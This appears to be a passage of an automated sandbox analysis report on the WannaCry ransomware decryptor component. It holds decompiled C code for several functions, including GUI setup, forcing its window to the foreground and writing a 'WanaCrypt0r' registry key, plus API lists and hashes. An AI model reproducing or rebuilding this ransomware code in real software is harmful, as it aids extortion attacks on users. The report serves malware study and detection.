				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}










                                  0x004060e0
                                  0x004060e2
                                  0x004060ed
                                  0x004060ee
                                  0x004060f5
                                  0x004060fe
                                  0x00406100
                                  0x00406101
                                  0x00406103
                                  0x00406107
                                  0x00406113
                                  0x00406117
                                  0x0040611c
                                  0x00406128
                                  0x0040612f
                                  0x00406134
                                  0x00406140
                                  0x00406147
                                  0x0040614c
                                  0x00406158
                                  0x0040615d
                                  0x00406168
                                  0x0040616d
                                  0x00406178
                                  0x0040617d
                                  0x00406188
                                  0x0040618d
                                  0x00406198
                                  0x0040619d
                                  0x004061a8
                                  0x004061ad
                                  0x004061b8
                                  0x004061bd
                                  0x004061c8
                                  0x004061cd
                                  0x004061d8
                                  0x004061df
                                  0x004061e4
                                  0x004061f0
                                  0x004061f7
                                  0x00406202
                                  0x00406209
                                  0x00406214
                                  0x00406219
                                  0x00406224
                                  0x00406229
                                  0x00406233
                                  0x00406239
                                  0x0040623f
                                  0x00406245
                                  0x0040624b
                                  0x00406251
                                  0x00406257
                                  0x0040625d
                                  0x00406263
                                  0x00406269
                                  0x0040626f
                                  0x00406275
                                  0x0040627b
                                  0x00406281
                                  0x00406287
                                  0x0040628d
                                  0x00406293
                                  0x00406299
                                  0x0040629f
                                  0x004062a5
                                  0x004062ab
                                  0x004062b1
                                  0x004062c1
                                  0x004062c6
                                  0x004062cb
                                  0x004062d5
                                  0x004062db
                                  0x004062e5
                                  0x004062ec
                                  0x004062f1
                                  0x004062f7
                                  0x004062fc
                                  0x00406303
                                  0x00406308
                                  0x00406313
                                  0x00406318
                                  0x0040631d
                                  0x00406322
                                  0x00406329
                                  0x0040632f
                                  0x00406335
                                  0x00406340
                                  0x00406346
                                  0x0040634c
                                  0x00406352
                                  0x00406358
                                  0x00406361
                                  0x0040636d
                                  0x00406377

                                  APIs
                                  • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                  • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                  • #567.MFC42(00000066,00000000), ref: 0040612F
                                  • #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                    • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                    • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                    • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                    • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                    • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                    • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                    • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                    • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                    • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                    • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                  • #567.MFC42(00000066,00000000), ref: 004061DF
                                  • #540.MFC42(00000066,00000000), ref: 004061F7
                                  • #540.MFC42(00000066,00000000), ref: 00406209
                                  • #540.MFC42(00000066,00000000), ref: 00406219
                                  • #540.MFC42(00000066,00000000), ref: 00406229
                                  • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                  • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                  • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                  • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                  • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                  • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                  • #860.MFC42(00421798), ref: 00406358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                  • String ID: 0ZA$0ZA$0ZA$DZA
                                  • API String ID: 3237077636-3729005435
                                  • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                  • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}





































                                  0x00405a60
                                  0x00405a62
                                  0x00405a6d
                                  0x00405a6e
                                  0x00405a85
                                  0x00405a8a
                                  0x00405a8c
                                  0x00405a96
                                  0x00405a9b
                                  0x00405aa6
                                  0x00405ab3
                                  0x00405abe
                                  0x00405ac1
                                  0x00405ad2
                                  0x00405add
                                  0x00405ae4
                                  0x00405af0
                                  0x00405af8
                                  0x00405aff
                                  0x00405b0b
                                  0x00405b13
                                  0x00405b1a
                                  0x00405b2b
                                  0x00405b33
                                  0x00405b3a
                                  0x00405b46
                                  0x00405b4e
                                  0x00405b55
                                  0x00405b61
                                  0x00405b69
                                  0x00405b70
                                  0x00405b7c
                                  0x00405b84
                                  0x00405b8b
                                  0x00405b90
                                  0x00405b98
                                  0x00405ba6
                                  0x00405bb2
                                  0x00405bba
                                  0x00405bc1
                                  0x00405bcd
                                  0x00405bd5
                                  0x00405bdc
                                  0x00405be8
                                  0x00405bf0
                                  0x00405bf7
                                  0x00405c03
                                  0x00405c0b
                                  0x00405c17
                                  0x00405c1f
                                  0x00405c2b
                                  0x00405c33
                                  0x00405c3f
                                  0x00405c47
                                  0x00405c53
                                  0x00405c5b
                                  0x00405c67
                                  0x00405c6f
                                  0x00405c7b
                                  0x00405c83
                                  0x00405c8f
                                  0x00405c97
                                  0x00405ca3
                                  0x00405cab
                                  0x00405cb7
                                  0x00405cbf
                                  0x00405ccb
                                  0x00405cd3
                                  0x00405cdf
                                  0x00405ce7
                                  0x00405cf3
                                  0x00405cfb
                                  0x00405d07
                                  0x00405d0f
                                  0x00405d1b
                                  0x00405d23
                                  0x00405d2f
                                  0x00405d37
                                  0x00405d43
                                  0x00405d4b
                                  0x00405d54
                                  0x00405d5c
                                  0x00405d65
                                  0x00405d70
                                  0x00405d7f
                                  0x00405d8c

                                  APIs
                                    • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                    • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                    • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                    • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                    • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                    • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                    • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                  • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                  • #2621.MFC42 ref: 00405A96
                                  • #6438.MFC42 ref: 00405A9B
                                    • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                  • #2514.MFC42 ref: 00405AC1
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                    • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                  • #800.MFC42 ref: 00405C33
                                  • #800.MFC42 ref: 00405C47
                                  • #800.MFC42 ref: 00405C5B
                                  • #800.MFC42 ref: 00405C6F
                                  • #781.MFC42 ref: 00405C83
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42 ref: 00405D37
                                  • #609.MFC42 ref: 00405D4B
                                  • #616.MFC42 ref: 00405D5C
                                  • #641.MFC42 ref: 00405D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                  • API String ID: 3942368781-2594244635
                                  • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                  • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 129 407a90-407ab7 130 407bf4-407c28 #2385 129->130 131 407abd-407ac5 129->131 132 407ac7 131->132 133 407aca-407ad1 131->133 132->133 133->130 134 407ad7-407af9 call 404c40 #2514 133->134 137 407b72-407bef #2414 * 2 #800 #641 134->137 138 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 134->138 137->130 138->137
                                  C-Code - Quality: 68%
                                  			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}


























                                  0x00407a96
                                  0x00407a98
                                  0x00407a9d
                                  0x00407aa2
                                  0x00407aa9
                                  0x00407ab5
                                  0x00407ab7
                                  0x00407abd
                                  0x00407ac5
                                  0x00407ac7
                                  0x00407ac7
                                  0x00407ad1
                                  0x00407add
                                  0x00407ae6
                                  0x00407af1
                                  0x00407af9
                                  0x00407afb
                                  0x00407b04
                                  0x00407b09
                                  0x00407b12
                                  0x00407b1a
                                  0x00407b27
                                  0x00407b28
                                  0x00407b2d
                                  0x00407b2f
                                  0x00407b35
                                  0x00407b3a
                                  0x00407b3c
                                  0x00407b42
                                  0x00407b47
                                  0x00407b50
                                  0x00407b55
                                  0x00407b5c
                                  0x00407b65
                                  0x00407b6d
                                  0x00407b6d
                                  0x00407b72
                                  0x00407b81
                                  0x00407b89
                                  0x00407b91
                                  0x00407b99
                                  0x00407ba2
                                  0x00407baa
                                  0x00407bae
                                  0x00407bba
                                  0x00407bc2
                                  0x00407bcb
                                  0x00407bd3
                                  0x00407bdb
                                  0x00407be4
                                  0x00407bef
                                  0x00407bef
                                  0x00407ad1
                                  0x00407bfb
                                  0x00407c09
                                  0x00407c0a
                                  0x00407c0b
                                  0x00407c0e
                                  0x00407c1b
                                  0x00407c28

                                  APIs
                                  • #2514.MFC42 ref: 00407AF1
                                  • #537.MFC42(***), ref: 00407B04
                                  • #941.MFC42(00421234,***), ref: 00407B1A
                                  • #939.MFC42(?,00421234,***), ref: 00407B28
                                  • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                  • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                  • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                  • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                  • #2385.MFC42(?,?,?), ref: 00407C0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                  • String ID: ***$[A$[A
                                  • API String ID: 3659526348-3419262722
                                  • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                  • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 141 4063a0-4064b5 #2302 * 12 #2370 * 3
                                  APIs
                                  • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                  • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                  • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                  • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                  • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                  • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                  • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                  • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                  • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                  • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                  • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                  • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                  • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                  • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                  • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2302$#2370
                                  • String ID:
                                  • API String ID: 1711274145-0
                                  • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                  • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 142 401c70-401cd8 wcscat 143 401cdc-401cde 142->143 144 401ce0-401cef 143->144 145 401cf1-401cfb 143->145 146 401d00-401d0c RegCreateKeyW 144->146 145->146 147 401d12-401d1b 146->147 148 401dad-401db5 146->148 149 401d62-401d8e RegQueryValueExA 147->149 150 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 147->150 148->143 151 401dbb-401dc7 148->151 152 401d9e-401dab RegCloseKey 149->152 153 401d90-401d98 SetCurrentDirectoryA 149->153 150->152 152->148 154 401dc8-401dd7 152->154 153->152
                                  C-Code - Quality: 84%
                                  			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}
















                                  0x00401c95
                                  0x00401ca3
                                  0x00401caf
                                  0x00401cb1
                                  0x00401cb3
                                  0x00401cb8
                                  0x00401cc1
                                  0x00401cd6
                                  0x00401cd8
                                  0x00401cdc
                                  0x00401cde
                                  0x00401d00
                                  0x00401ce0
                                  0x00401d00
                                  0x00401d00
                                  0x00401d06
                                  0x00401d0c
                                  0x00000000
                                  0x00401d12
                                  0x00401d12
                                  0x00401d1b
                                  0x00401d79
                                  0x00401d81
                                  0x00401d8b
                                  0x00401d8d
                                  0x00401d8e
                                  0x00401d98
                                  0x00401d98
                                  0x00401d1d
                                  0x00401d2a
                                  0x00401d38
                                  0x00401d53
                                  0x00401d55
                                  0x00401d5d
                                  0x00401d5f
                                  0x00401d5f
                                  0x00401da3
                                  0x00401dab
                                  0x00401dd7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401dab
                                  0x00000000
                                  0x00401dad
                                  0x00401dad
                                  0x00401db1
                                  0x00401db1
                                  0x00401dc7
                                  0x00000000

                                  APIs
                                  • wcscat.MSVCRT ref: 00401CC1
                                  • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                  • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
